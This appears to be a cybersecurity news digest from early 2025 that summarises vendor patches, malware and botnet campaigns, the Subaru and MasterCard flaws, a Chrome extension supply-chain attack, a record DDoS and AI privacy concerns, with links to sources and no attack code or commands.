iOS 18.3 and iPadOS 18.3 security update released January 27, 2025, addresses multiple vulnerabilities affecting recent devices. Key fixes involve potential unauthorized access, denial-of-service risks, and privilege escalation. Each vulnerability is linked to specific CVE-ID, and Apple prioritizes user safety by withholding details until patches are available. For further details, consult the Apple security releases page.
TV-2025-1001 Summary: Vulnerability (CVE-2025-0065) in TeamViewer Clients allows local privilege escalation on Windows via argument injection; affects versions < 15.62. Fix: Update to version 15.62 or latest.
https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1001/
Hacker infects 18,000 “script kiddies” globally with fake malware builder, a trojanized XWorm RAT, which steals data and controls infected systems. The malware was spread through various platforms and included a kill switch, but many systems remain compromised. Security researchers disrupted the botnet using a mass uninstall command. Users are warned against trusting unsigned software from other criminals.
Cisco Talos reports a rise in email threats using hidden text salting to evade detection. This technique involves inserting invisible characters or comments in the HTML of emails, confusing parsers and spam filters. It tricks systems into misidentifying brand names and languages in phishing attempts. Success against this method requires advanced detection strategies, inspecting suspicious CSS properties, and utilizing AI-driven email security solutions.
https://blog.talosintelligence.com/seasoning-email-threats-with-hidden-text-salting/
Lumma Stealer uses fake CAPTCHAs for malware delivery in a global campaign targeting various sectors, particularly telecom. Attackers use social engineering to trick victims into executing commands outside the browser, evading security measures, leveraging techniques like process hollowing and PowerShell obfuscation to bypass defenses. The malware evolves continuously, making detection and prevention challenging, and Netskope provides proactive threat detection against this campaign.
https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
Security researchers discovered vulnerabilities in Subaru’s Starlink service that allowed them to track the locations of millions of cars, gaining access to up to a year's worth of detailed location data, including sensitive personal visits. Sam Curry and Shubham Shah demonstrated flaws that let them hijack car controls and access location histories by exploiting administrative weaknesses in Subaru's system. Though Subaru has since fixed the vulnerabilities, concerns remain about privacy regarding employee access to location data. Similar vulnerabilities have affected multiple automakers, highlighting broader issues in the automotive industry regarding data privacy and security.
https://www.wired.com/story/subaru-location-tracking-vulnerabilities/
Thousands of credentials from major cybersecurity vendors were found on the dark web, as reported by Cyble. Credentials from at least 14 security providers were leaked and sold for as low as $10, impacting both internal accounts and customer access. Notable vendors affected include McAfee, CrowdStrike, and Palo Alto Networks, with significant credential exposures. The breaches likely resulted from compromised internal systems, highlighting the need for dark web monitoring to prevent larger cyberattacks.
https://www.infosecurity-magazine.com/news/cybersecurity-vendors-credentials/
Chrome Desktop Update: Version 132.0.6834.110/111 released for Windows, Mac, and Linux with 3 security fixes, including high severity issues in V8. Update rolls out over days/weeks; details on fixes available. Internal security improvements noted.
https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop_22.html
TLDR: On December 26, 2024, Cyberhaven reported a targeted supply chain attack on their Chrome extension via compromised developer permissions gained through phishing. The attacker injected malicious code into a dozen extensions, aiming to harvest sensitive data (API keys, session cookies) from hundreds of thousands of users, including those of ChatGPT and Facebook. The report details phishing tactics, the compromised extensions, and the adversary's infrastructure, urging users to remove affected extensions and monitor their accounts for suspicious activity.
https://blog.sekoia.io/targeted-supply-chain-attack-against-chrome-browser-extensions/
MasterCard fixed a major domain name server error that allowed potential interception of its Internet traffic due to a typo that went unnoticed for nearly five years. A security researcher, Philippe Caturegli, registered the misspelled domain for $300 to prevent exploitation. Although MasterCard asserted there was no real threat, Caturegli argued that the misconfiguration posed significant risks, potentially enabling Man-in-the-Middle attacks. After notifying MasterCard, he faced backlash for publicly disclosing the error, suggesting a need for better corporate acknowledgment of security vulnerabilities.
https://krebsonsecurity.com/2025/01/mastercard-dns-error-went-unnoticed-for-years/
Cloudflare mitigated a record 5.6 Tbps DDoS attack on October 29, 2024, from a Mirai-based botnet of 13,000 devices, targeting an ISP in Eastern Asia. The 80-second attack was detected and mitigated autonomously, causing no alerts or impact. Hyper-volumetric DDoS attacks are rising, with significant increases in attacks over 1 Tbps and bursts lasting under 10 minutes. The most targeted industries were telecommunications and internet services, especially during peak usage times, indicating a trend toward ransom DDoS attacks.
7-Zip patched a high-severity vulnerability (CVE-2025-0411) that allowed attackers to bypass Windows Mark of the Web (MotW) security warnings, enabling code execution by improperly handling nested archives. Users must update to version 24.09 to mitigate this risk, as many may still use vulnerable versions without auto-update.
GeoSpy, an AI tool by Graylark Technologies for law enforcement, analyzes photos to determine locations in seconds, revealing significant privacy risks. While originally intended for official use, public access led to misuse, including stalking. The tool requires no training, enabling any user to locate individuals via social media images despite stripped metadata. Concerns arise over potential abuse and the security of private data involved. GeoSpy's public access has now been restricted following reports of such misuse.
Extreme TLDR: Murdoc Botnet, a new Mirai variant, exploits AVTECH Cameras and Huawei HG532 routers, utilizing ELF files and shell scripts for deployment. Launched in July 2024, it features over 1300 active IPs and 100+ command-and-control servers. Affected primarily are Malaysia, Thailand, Mexico, and Indonesia. Recommendations include monitoring for suspicious activities and keeping systems updated.
Employees often input sensitive data into generative AI (GenAI) tools, increasing risks for enterprises, as 8.5% of prompts analyzed contained sensitive information. The categories at risk include customer data (45.77%), employee data (27%), legal/finance (14.88%), and security codes (5.64%). Organizations face a dilemma: adopt GenAI for efficiency or risk exposing sensitive data. Effective governance strategies, such as real-time tracking and employee training, are crucial to mitigative risks while leveraging GenAI's advantages.
https://www.darkreading.com/threat-intelligence/employees-sensitive-data-genai-prompts
